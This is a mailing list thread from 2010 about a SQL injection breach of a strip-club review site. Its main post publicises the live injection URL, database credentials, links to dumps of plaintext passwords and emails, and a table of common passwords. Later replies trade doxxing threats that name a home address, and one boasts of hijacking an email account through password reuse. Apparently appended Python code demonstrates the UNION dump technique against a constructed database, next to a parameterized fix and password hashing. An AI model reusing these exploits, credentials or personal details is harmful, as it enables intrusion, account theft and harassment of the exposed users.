
Full Disclosure mailing list archives
Re: Tuscl.net SQL injection with 30k Plain Text Passwords & 80k Email list
From: Ben <iluv2cane () gmail com>
Date: Wed, 8 Sep 2010 22:10:12 +0000
*From:* "www.tuscl.net" <tuscl.founder () gmail com>
*To:* auto595158 () hushmail com, iluv2cane () gmail com, benhuoh () gmail com, benhu () physics uakron edu
*Date:* Wed, 08 Sep 2010 19:01:24 +0000

Just received this email from the owner of the site:

Ben

How 'bout I send a couple of strippers over to your condo there in Akron so you can cane them. You're still at 1381 Waters Edge, right? Then maybe I will blast out an email to all your colleagues there at the physics department of the University of Akron with this little jewel...

*I have a suggestion for a Mood Pictures movie which would be called something like "Crime Deterrent Video for Girls." ...*

Ah, hell, Ben, you know the plot... but what I really like is the last line of the email:

*"I think it is a nice psychological touch to imagine a class of 14 or 15 year-old girls being made to see the canings shown in this video."*

I'm sure the FBI will be all over that.

Tell you what Mr. Ben Yu-Kuang Hu, let's make a deal. You clean up the mess you made, stay the hell off my site, and I will forget this little escapade ever happened. Deal?

-----------------------------------------------

So first off, I should report your ass to the FBI for prostitution. Second, this email account I signed up with happened to contain the same password for your site as it did for its email. So to hide myself further and cause you to run around chasing my proxies and pin the blame on some retard who is obsessed over BDSM. Third, I'll fix your website, give me the root password :D

On Fri, Sep 3, 2010 at 8:37 PM, Ben <iluv2cane () gmail com> wrote:
Worked in Firefox.... if you see the title bar stating 3,8 that's the union select ;)

Also per this page: http://www.tuscl.net/contact-login.php

"Recently we lost a week's worth of user data. We believe it was the work of hackers, and have tightened our security measures."

On Fri, Sep 3, 2010 at 8:32 PM, Jhfjjf Hfdsjj <taser3000 () yahoo com> wrote:

Well, one thing I will point out is that the link you submitted for the actual SQL injection doesn't seem to work. Either they fixed it or you messed up the link.

------------------------------
*From:* Ben <iluv2cane () gmail com>
*To:* full-disclosure () lists grok org uk
*Sent:* Fri, September 3, 2010 11:09:04 AM
*Subject:* [Full-disclosure] Tuscl.net SQL injection with 30k Plain Text Passwords & 80k Email list

I found many SQL injections on Tuscl.net (The Ultimate Strip Club List). I tried notifying the site, no response.

The server is run on VMware, so anything that is done to it is restored upon reboot.

This is a dump of usernames, passwords and emails for the site. They are in plain text. I have removed records that had the system-generated password that the user never changed.
http://tinyurl.com/397rzqs
http://bit.ly/bkVnPY
http://is.gd/eTqna
http://jump.fm/FOJRO
http://www.mediafire.com/?l6i1vd25il61a6b
http://www.megafileupload.com/en/file/265174/users-sql-zip.html
http://www.4shared.com/file/w0qqRyDf/userssql.html
http://rapidshare.com/files/416858410/users.sql.zip
http://rapidshare.com/files/416860069/users.sql.zip
http://www.speedyshare.com/files/24097837/users.sql.zip
http://uploading.com/files/e1741mm9/users.sql.zip/
http://bit.ly/cFvd8B
http://is.gd/eTsn5

The injection:

http://www.tuscl.net/c.php?CID=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17

Common passwords and the number of accounts that shared them:

password - 269
123456 - 173
tuscl - 84
stripper - 67
qwerty - 62
12345 - 49
12345678 - 47
1234 - 42
baseball - 36
monkey - 36
princess - 34
stripclub - 33
strip - 32
jennifer - 32
abc123 - 32
mustang - 31
pussy - 29
lapdance - 27
andrew - 27
jmh1978 - 27
letmein - 27
fuckyou - 27
696969 - 27
michelle - 26
harley - 25
dallas - 25
111111 - 25
shadow - 24
corvette - 24
trustno1 - 24
sunshine - 22
dragon - 21
jordan - 21
love - 21
butthead - 20
batman - 20
danielle - 20
buster - 20
password1 - 20
hello - 20
biteme - 20
gaydar - 20
Michael - 19
george - 19
hockey - 19
ginger - 19
6969 - 19
Bandit - 19
lasvegas - 18
taylor - 18
tigger - 18
yankees - 18
chicago - 18
fucker - 18
blahblah - 17
football - 17
1escobar2 - 17
1111 - 17
Jessica - 17
123456789 - 16
testing - 16
phoenix - 16
badboy - 16
gemini - 16
ranger - 16
heather - 15
gateway - 15
secret - 15
welcome - 15
654321 - 15
aaaaaa - 15
tennis - 15
asshole - 15
maggie - 14
pepper - 14
charlie - 14
golfer - 14
strippers - 14
redskins - 14
summer - 14
peanut - 14
chicken - 13
jeremy - 13
hunter - 13
m0ntlure - 13
fuckoff - 13
dancer - 13
bitch - 13
lucky - 13
whatever - 13
killer - 13
prince - 13
robert - 13
orange - 13
thomas - 13
hawaii - 12
redsox - 12
tiger - 12
titties - 12
gators - 12
Password - cnt
florida - 12
kitten - 12
austin - 12
merlin - 12
canada - 12
diamond - 12
boston - 12
master - 12
yellow - 12
falcon - 12
jasmine - 12
1234567 - 12
cookie - 12
superman - 12
midnight - 12
blowme - 12
jackass - 12
sparky - 12
peekaboo - 11
doctor - 11
brandy - 11
8675309 - 11
madison - 11
braves - 11
brooklyn - 11
money - 11
anthony - 11
samantha - 11
ashley - 11
lucky1 - 11
amanda - 11
booboo - 11
SOCCER - 11
tarheels - 11
bigdog - 11
pookie - 11
private - 11
tiffany - 11
martin - 11
silver - 11
lakers - 10
eatme - 10
junior - 10
platinum - 10
sex - 10
iloveyou - 10
nicole - 10
vegas - 10
wolfpack - 10
55555555 - 10
barney - 10
melissa - 10
molly - 10
passw0rd - 10
sexy - 10
nascar - 10
dietcoke - 10
chris - 10
boomer - 10
test123 - 10
johnny - 10
red123 - 10
asdfgh - 10
ncc1701 - 10
314159 - 10
internet - 10
jackson - 10
computer - 10
peaches - 10
horny - 10
sierra - 10
rush2112 - 10

Here is the complete list of email addresses registered. The site had no validation so, I am sure, some are fake.

http://www.tuscl.net/emails.zip
http://rapidshare.com/files/416871314/emails.zip
http://www.mediafire.com/?67rzfbvmyr1c492
http://www.speedyshare.com/files/24098846/emails.zip
http://www.megafileupload.com/en/file/265210/emails-zip.html

The path to the working directory is: /home/httpd/vhosts/tuscl.net/httpdocs/

The SQL information is "localhost" - "tuscl" - "szg4wpl9"

Also if you want to look at all the nudey photos uploaded, here is where they are: http://www.tuscl.net/pictures/

There are other sites that could have been compromised as well:

vanjonesthinksimanasshole.com
tuscl.com
onerun.com
ecampguide.com (contains another 1200 plain text passwords)
troopedge.com

Well, have fun! Owner or media, if you want to get ahold of me: auto595158 () hushmail com
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
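The UNION-based probe the original post describes (c.php?CID=-1 union select 1,2,...,17, with marker numbers such as "3,8" showing up in the rendered page) reproduced as an added example against a constructed in-memory SQLite database. This is not code from the site or from anyone in the thread; the table and column names, the sample rows, and the 4-column width are assumptions (the post says the real query needed 17 columns). The vulnerable handler pastes CID into the SQL the way the post implies; the hardened one validates the type and binds the value as a parameter, so the same payload is rejected instead of executed.

```python
import sqlite3

# Constructed stand-in for the site's database (assumed schema, not the real one).
# The 'clubs' table has 4 columns so the column-count probe stays short.
SCHEMA = """
CREATE TABLE clubs (cid INTEGER PRIMARY KEY, name TEXT, city TEXT, rating INTEGER);
CREATE TABLE users (uid INTEGER PRIMARY KEY, username TEXT, password TEXT, email TEXT);
INSERT INTO clubs VALUES (1, 'Club One', 'Dallas', 4), (2, 'Club Two', 'Las Vegas', 5);
INSERT INTO users VALUES (1, 'alice', 'password', 'alice@example.invalid'),
                         (2, 'bob', '123456', 'bob@example.invalid');
"""


def open_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def club_page_vulnerable(conn, cid):
    """Models the injectable c.php: the CID query-string value is pasted into the SQL."""
    sql = "SELECT cid, name, city, rating FROM clubs WHERE cid = %s" % cid
    return conn.execute(sql).fetchall()


def club_page_fixed(conn, cid):
    """Hardened form: reject anything that is not an integer, then bind it."""
    try:
        cid_int = int(cid)
    except (TypeError, ValueError):
        raise ValueError("CID must be an integer")
    sql = "SELECT cid, name, city, rating FROM clubs WHERE cid = ?"
    return conn.execute(sql, (cid_int,)).fetchall()


def fixed_rejects(conn, cid):
    """True when the hardened handler refuses the value (used by the checks below)."""
    try:
        club_page_fixed(conn, cid)
    except ValueError:
        return True
    return False


def find_column_count(conn, max_cols=20):
    """Step 1 of the probe: grow the marker list until the UNION stops erroring.
    A width mismatch raises 'SELECTs to the left and right of UNION do not have
    the same number of result columns'; the first width that succeeds is the answer."""
    for n in range(1, max_cols + 1):
        markers = ",".join(str(i) for i in range(1, n + 1))
        try:
            club_page_vulnerable(conn, "-1 UNION SELECT " + markers)
            return n
        except sqlite3.OperationalError:
            continue
    return None


def dump_users(conn, ncols, slot=2):
    """Step 2: the marker numbers that appear in the page (the post saw '3,8' in
    the title bar) mark rendered columns; replace one with a subquery on 'users'.
    cid=-1 matches no real club, so only the UNION rows come back."""
    cols = [str(i) for i in range(1, ncols + 1)]
    cols[slot - 1] = "username || ':' || password"
    payload = "-1 UNION SELECT " + ",".join(cols) + " FROM users"
    rows = club_page_vulnerable(conn, payload)
    return sorted(row[slot - 1] for row in rows)


if __name__ == "__main__":
    db = open_db()
    width = find_column_count(db)
    print("UNION width:", width)
    print("leaked:", dump_users(db, width))
    print("hardened handler rejects payload:", fixed_rejects(db, "-1 UNION SELECT 1,2,3,4"))
```

The width search is what the 17-marker URL in the post is the end result of; on MySQL the same mismatch surfaces as "The used SELECT statements have a different number of columns", and the rest of the procedure is identical. Note that casting to int is the right fix only because CID is numeric; a string parameter still needs binding, but has no type check to lean on.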
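The "password - count" table in the original post could only be built because the site stored passwords in the clear. As an added example, not from the site or from anyone in the thread, here is that tally run over a constructed sample dump, beside what the same users table looks like once passwords are stored as salted PBKDF2-HMAC-SHA256 hashes (the storage format string and the round count are assumptions). With a per-user salt, the same tally over the hash column finds no duplicates, so a dump no longer tells an attacker which 269 accounts share "password" or lets the credentials be replayed against the users' email accounts, as happened later in this thread.

```python
import hashlib
import hmac
import os
from collections import Counter

# Constructed sample rows in the shape of the dump the post describes:
# (username, plaintext password). Not real data from the site.
SAMPLE_DUMP = [
    ("u1", "password"), ("u2", "123456"), ("u3", "password"),
    ("u4", "tuscl"), ("u5", "password"), ("u6", "123456"),
]

# Assumed work factor; tune so one hash costs ~100 ms on the real server.
PBKDF2_ROUNDS = 200_000


def shared_password_table(rows, top=3):
    """Rebuilds the 'password - count' table the post printed from a plaintext dump."""
    counts = Counter(pw for _, pw in rows)
    return counts.most_common(top)


def hash_password(password, salt=None):
    """Salted PBKDF2-HMAC-SHA256; the record carries algorithm, rounds and salt
    so verification stays possible after the round count is raised."""
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, PBKDF2_ROUNDS)
    return "pbkdf2_sha256$%d$%s$%s" % (PBKDF2_ROUNDS, salt.hex(), digest.hex())


def verify_password(password, stored):
    """Recomputes from the stored salt and rounds; constant-time compare on the digest."""
    algo, rounds, salt_hex, digest_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        return False
    digest = hashlib.pbkdf2_hmac(
        "sha256", password.encode("utf-8"), bytes.fromhex(salt_hex), int(rounds)
    )
    return hmac.compare_digest(digest.hex(), digest_hex)


def hashed_dump(rows):
    """The same table as the site should have stored it."""
    return [(user, hash_password(pw)) for user, pw in rows]


def shared_hash_table(rows_hashed, top=3):
    """Same tally over the hash column: every entry is unique because of the salt."""
    counts = Counter(h for _, h in rows_hashed)
    return counts.most_common(top)


if __name__ == "__main__":
    print("plaintext dump reveals:", shared_password_table(SAMPLE_DUMP))
    hashed = hashed_dump(SAMPLE_DUMP)
    print("hashed dump reveals:", shared_hash_table(hashed))
    print("login still works:", verify_password("password", hashed[0][1]))
```

A slow, salted hash does not stop an attacker from guessing "password" and "123456" against individual records, which is why the top of the post's table would still fall to an offline dictionary run; it removes the free wins (reading the column, spotting reuse across accounts, and the email-account takeover described above) and makes each remaining guess cost the full round count.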
Current thread:
- Tuscl.net SQL injection with 30k Plain Text Passwords & 80k Email list Ben (Sep 03)
- Re: Tuscl.net SQL injection with 30k Plain Text Passwords & 80k Email list Jhfjjf Hfdsjj (Sep 04)
- Message not available
- Re: Tuscl.net SQL injection with 30k Plain Text Passwords & 80k Email list Ben (Sep 04)
- Re: Tuscl.net SQL injection with 30k Plain Text Passwords & 80k Email list Ben (Sep 08)
- Re: Tuscl.net SQL injection with 30k Plain Text Passwords & 80k Email list Benji (Sep 08)
- Message not available
- Re: Tuscl.net SQL injection with 30k Plain Text Passwords & 80k Email list Jhfjjf Hfdsjj (Sep 04)